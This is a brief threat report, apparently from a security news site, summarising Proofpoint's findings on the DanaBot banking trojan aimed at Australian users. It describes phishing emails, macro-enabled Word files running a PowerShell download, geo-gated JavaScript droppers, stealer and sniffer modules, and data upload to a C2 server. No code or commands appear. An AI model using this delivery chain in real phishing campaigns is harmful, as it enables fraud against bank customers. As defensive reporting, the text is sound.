DanaBot is a banking trojan discovered by Proofpoint researchers targeting users in Australia through malicious emails. Still considered under development, the banking trojan was first seen sending out emails with subject lines such as “Your E-Toll account statement”, which contained URLs directing victims to a Microsoft Word Document containing macros that are hosted on another site. If the macros are enabled, a PowerShell command is run that downloads DanaBot. The second wave of DanaBot banking trojan attacks was seen using URLs that redirected users to a zipped JavaScript file that, when executed, would download the trojan onto the machine if the server detected the victims IP address to be from Australia. The malicious payload downloads three DLL files that contain a stealer and sniffer, and also a configuration file that contains a list of targeted sites for the sniffer module, banking web injects, and a list of cryptocurrency processes and files to monitor. When DanaBot is present on the victims system, it uploads files to the C2 server that includes detailed system information, screenshots of the user’s desktop, and a list of files on the user’s hard disk.

Technical Details:

  • Proofpoint provides technical analysis of DanaBot, here.

Image Source: Proofpoint